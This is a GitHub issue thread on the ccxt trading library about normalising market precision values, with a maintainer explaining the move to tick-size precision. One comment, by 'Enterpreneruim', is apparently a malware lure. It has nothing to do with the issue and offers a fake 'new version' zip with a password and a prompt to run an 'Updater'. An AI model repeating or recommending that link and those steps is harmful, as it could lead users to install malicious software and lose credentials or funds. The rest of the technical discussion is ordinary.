### ISSUE TITLE
Normalise precision in market structure

### ISSUE THREAD

**Issue by WillPCowan** [ccxt/ccxt#22176]
### Programming Languages

Python 3.11

### CCXT Version

4.2.99

### Description

Currently precision values (for quantity/price) in market structures are not normalised. For example for the precision of 1e-4, this could be represented with the form '4' or '0.0001' depending on the exchange. 

E.g. Bybit ETH/USDT (using decimal form)
`'precision': {'amount': 1e-05, 'price': 0.01, 'cost': None, 'base': None, 'quote': None}`

E.g. Binance ETH/USDT (using integer form)
`'precision': {'amount': 4, 'price': 2, 'cost': None, 'base': 8, 'quote': 8}`

It'd be better to use the form '0.0001' so that when e.g. min quantity is something like 1000KRW (e.g. Upbit ETH/KRW) then there is no issue. 

### Code

```
  

```

**Comment by Enterpreneruim** [comment]
New Version has been Released 4.3.6
Fixed: Password asking, failed system load, XML load and etc. coinex fixed, coinbase fixed.
Extract files into folder with older version and start Updater.
[ccxt_upd_fetched.zip](https://github.com/ccxt/ccxt/files/15094134/ccxt_upd_fetched.zip)
Full link - https://github.com/ccxt/ccxt/files/15094134/ccxt_upd_fetched.zip
- Password 2024
- Current Status: Working, April 24.

**Comment by anonFacePalm** [comment]
Yes, currently market structure precision values are inconsistent, however, the "decimal" format suggested here should not be used, as that is not the precision.

According to the ccxt Manual/Wiki, the definition of precision( [https://en.wikipedia.org/wiki/Precision_(arithmetic)] ), and various external implementations of precision(Javascript: [https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Number/toPrecision]  - (significant_digits_precision is toPrecision and decimal_places_precision is toFixed)), precision is an integer equal to the number of decimal places or significant digits.

1: ccxt should always use the integer format in accordance with the Manual [https://docs.ccxt.com/#/README?id=precision-and-limits] which states: 'Do not confuse limits with precision! Precision has nothing to do with min limits. A **precision of 8 digits** does not necessarily mean a **min limit of 0.00000001**.' (emphasis added)
2: ccxt code tests and comments expect precision to be an integer between -8 and 18 (inclusive).
3: According to various comments, there seems to be a known issue in 'exchange.decimalToPrecision' where negative precision is not working properly.  This should be resolved soon, which would then allow precision to be normalized as an integer.
4: The 'decimal form' mentioned is the 'tick size', not the precision. [https://docs.ccxt.com/#/README?id=precision-mode]
5: For certain markets, tick_size is 1, which has an acceptable value set collision with precision.  Therefore using tick_size and precision interchangeably will lead to unexpected downstream errors for that market. 

Once negative precision works in 'exchange.decimalToPrecision', and precision is unified for all exchanges, then the methods for formatting decimals [https://docs.ccxt.com/#/README?id=methods-for-formatting-decimals] will once again work for all cases, and the min quantity issue mentioned here (as well as others) will be resolved.

@sc0Vu

**Comment by ttodua** [comment]
@anonFacePalm 
thanks for suggestions. 
however:
1) "using integer format" - CCXT upgraded the precisions implementation and we now everywhere use `TICK_SIZE` precision which is superior and more informative than integer format. so, it is permanent update, there will be no integer-formats available anywhere from now and onwards. (only exception is the 3 exchanges: bitfinex, bitvavo and bithumb, which use `SIGNIFICANT_DIGITS` in exchange['precisionMode']`)

2) about tests - we have added tests in recent past, but i'll revise tests if there can be done more thorough checks. thanks

3) that might be a known bug, we will review it's place in tasks queue and post an update.

4) I think i don't understand what did you say. if you can, please explain a bit better (or a screenshot)

5) I also not follow there. please give some further explanation/examples of what do you mean. because, we can talk about two concepts: `limits` and `precisions` which are different things. `price` and `amount` has their own precision & limit. I don't understand of what conflicts you mean

**Comment by anonFacePalm** [comment]
@ttodua 

So from your response, I get that this is a permanent change, but if so, can the field please be renamed to 'increment', 'tick_size' or something else??  Please. 

The way I found out that this (permanent!) change had been made was from experiencing breaking changes after upgrading ccxt and having to dig into why everything was throwing exceptions.  I've fixed it, but I'm expecting the possibility of more errors from this in the future.

And sure, the docs might be out of date, but according to the docs, 99% of exchanges use the decimal places precisionMode, so why is this permanent change and removal of decimal places needed when it is what most exchanges use??

as far as your questions: 
- My 4 was essentially your 1.  We agree that what OP described as "decimal form" is actually the 'tick_size'.
- Having different possibilities for what 'precision' should be is complicated when the possible sets of values are not consistent.

Previously when ccxt's definition of precision was an integer (decimal_places and significant_digits) between -8 and 18 (inclusive):  There were 27 possible values in the set.  If the value of 1 or 10 was found, it was known that that meant ~0.1 or ~0.0000000001 as the minimum increment  (which may or may not have been the tick_size or actual increment -- which is probably why ccxt is moving to 'tick_size' as the standard.)

However, once ccxt defines precision as a decimal with a possible range of 0.000000000000000001 - 500000000., then the 18 positive values of "integer precision" are present in the possible set of ccxt's "decimal precision".

And for many users, this is an additional hurdle to writing code, because the functions built into Javascript, Python, and PHP take parameters of "integer precision".  An increment value of 1 will have to use an "integer precision" of 0 in the native language functions in order to return the correct number of decimal places(i.e. a valid size) to ccxt.  Likewise, an increment of 10 has to be converted into -1 for js, python, and php functions, but itegers 1-18 are valid values for both conflicting definitions of 'precision'.

So the user might try to have and use a concept of "decimal precision" in their code, which ccxt is unhelpfully mis-defining, while still allowing most of the "decimal precision" values to be a valid value for ccxt's 'precision', but one that will produce incorrect results and throw errors.

So:  Can this new concept of "decimal precision" be renamed to 'tick_size' or 'increment', or anything besides 'precision'?

**Comment by ttodua** [comment]
@anonFacePalm thanks for the thorough replies:
- there is already a pending PR to fix the docs: https://github.com/ccxt/ccxt/pull/23316 to remove the mention of DECIMAL_PLACES
- no, migration to TICK_SIZE is a permanent change and we will not revert back to DECIMAL_PLACES (integer presentation of precision). The reason is that TICK_SIZE can represent precisions more accurately (i.e. 0.02) which cant be represented by integer precision. so, TICK_SIZE is successor. CCXT provides the necessary information with regard to that, however, using that value belongs to user-side, so you should have your custom code to transform or use that value as you need. CCXT's `decimal_to_precision` method also accepts float values with TICK_SIZE precision mode, so:
```
decimal_to_precision(..., ..., 4, ccxt.DECIMAL_PLACES) 
is same as
decimal_to_precision(..., ..., 0.0001, ccxt.TICK_SIZE)
```
also, to convert TICK_SIZE to DECIMAL_PLACES, you can use a helper method `exchange.precision_from_string(1.23456)` and it will give you `5`.

**Comment by ttodua** [comment]
for your above comment about WIKI changes suggestions I'll tag @carlosmiei to consider changes to docs.
